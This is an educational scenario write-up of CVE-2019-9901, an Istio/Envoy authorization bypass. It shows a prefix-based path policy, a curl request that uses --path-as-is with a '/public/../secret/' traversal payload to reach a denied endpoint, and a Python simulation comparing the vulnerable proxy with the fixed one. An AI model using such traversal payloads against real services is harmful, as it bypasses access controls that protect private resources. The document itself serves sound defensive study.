CVE-2019-9901 - Istio/Envoy Path traversal

This scenario demo has been taken from https://github.com/eoftedal/writings/blob/master/published/CVE-2019-9901-path-traversal.md. Thanks to Erlend Oftedal.

A simple web server with two endpoints, /public/ and /secret/, was deployed on Kubernetes behind Istio. An authorization policy (an Istio ServiceRole) was then added that was meant to grant GET access only to paths below /public/, with everything else denied:

  rules:
  - services: ["backend.fishy.svc.cluster.local"]
    methods: ["GET"]
    paths: ["/public/*"]

A standard path traversal request was then sent with curl. The --path-as-is flag matters here: by default curl resolves the ../ segment on the client side and would simply send /secret/, which the policy denies.

curl -vvvv --path-as-is  "http://backend.fishy.svc.cluster.local:8081/public/../secret/"

The request was allowed through and reached /secret/. Envoy evaluated the policy against the raw path /public/../secret/, which satisfies the /public/* prefix match, while the backend web server resolved the ../ segment and served /secret/. The authorization check and the backend thus disagreed about which resource the request named.
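The following simulation is an added example, not code from the original scenario or from Istio/Envoy. It models the policy above and the curl request as a small script: a simplified ServiceRole path matcher, an RFC 3986 dot-segment normalizer standing in for what the backend (and curl without --path-as-is) does, and a proxy that either evaluates the policy on the raw path (the vulnerable behaviour in Envoy 1.9.0 and older, Istio before 1.1.2 and 1.0.7) or normalizes first (the fixed behaviour). The rule list is the one from the scenario with the services field dropped, since only one service is simulated.

```python
"""Simulation of CVE-2019-9901: the proxy evaluates its path-based
authorization policy on the raw request path, while the backend resolves
dot segments and serves a different resource.

Added example, not code from the original scenario, from Istio or from
Envoy. The matcher and normalizer are simplified re-implementations
written for illustration; the rule list is the one from the scenario.
"""
from typing import Dict, List, Optional, Tuple

# Authorization rule from the scenario (a ServiceRole 'rules' entry); the
# 'services' field is omitted because only one service is simulated.
RULES: List[Dict[str, List[str]]] = [
    {"methods": ["GET"], "paths": ["/public/*"]},
]


def remove_dot_segments(path: str) -> str:
    """Resolve '.' and '..' the way a web server (or curl without
    --path-as-is) does, following RFC 3986 section 5.2.4. Surplus '..'
    segments are discarded instead of escaping above '/'. Percent-encoded
    forms such as %2e%2e are deliberately not decoded here."""
    out: List[str] = []
    for seg in path.split("/"):
        if seg == "..":
            if out:
                out.pop()
        elif seg != ".":
            out.append(seg)
    norm = "/".join(out)
    # A trailing '.' or '..' segment names a directory, so keep a slash.
    if path.endswith(("/.", "/..")) and not norm.endswith("/"):
        norm += "/"
    return norm if norm.startswith("/") else "/" + norm


def path_matches(pattern: str, path: str) -> bool:
    """ServiceRole path semantics: exact match, prefix match for a trailing
    '*' (as in '/public/*'), suffix match for a leading '*' (as in '*/x')."""
    if pattern == "*":
        return True
    if pattern.endswith("*"):
        return path.startswith(pattern[:-1])
    if pattern.startswith("*"):
        return path.endswith(pattern[1:])
    return path == pattern


def policy_allows(method: str, path: str,
                  rules: List[Dict[str, List[str]]]) -> bool:
    """Default deny: the request passes only if some rule matches both its
    method and its path."""
    return any(
        method in rule["methods"]
        and any(path_matches(p, path) for p in rule["paths"])
        for rule in rules
    )


def proxy_request(method: str, raw_path: str,
                  rules: List[Dict[str, List[str]]],
                  normalize_before_authz: bool) -> Tuple[bool, Optional[str]]:
    """Model the proxy in front of the backend.

    normalize_before_authz=False is the vulnerable behaviour: the policy
    sees the raw path exactly as sent.  normalize_before_authz=True is the
    fixed behaviour: the path is normalized first, so the policy sees the
    same path the backend will serve.

    Returns (allowed, path the backend serves, or None when denied).
    """
    authz_path = remove_dot_segments(raw_path) if normalize_before_authz else raw_path
    if not policy_allows(method, authz_path, rules):
        return False, None
    # The backend always resolves dot segments before routing the request.
    return True, remove_dot_segments(raw_path)


def curl_sends(url_path: str, path_as_is: bool) -> str:
    """Path curl puts on the wire: by default curl squashes '/../' itself,
    which is why the scenario needs --path-as-is to deliver the payload."""
    return url_path if path_as_is else remove_dot_segments(url_path)


if __name__ == "__main__":
    payload = "/public/../secret/"  # the path from the scenario's curl call
    for as_is in (False, True):
        wire = curl_sends(payload, as_is)
        for fixed in (False, True):
            allowed, served = proxy_request("GET", wire, RULES, fixed)
            print(f"path_as_is={as_is!s:5} normalize_first={fixed!s:5} "
                  f"wire={wire:20} allowed={allowed!s:5} served={served}")
```

Only one of the four combinations reaches /secret/: the payload delivered verbatim (--path-as-is) against a proxy that matches on the raw path. With normalization moved in front of the policy check, the same request is denied, which is the essence of the fix. The normalizer here leaves percent-encoded dot segments alone, so a real deployment should also verify how the proxy and backend treat encodings such as %2e%2e, not just the literal ../ shown in this scenario.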

Reference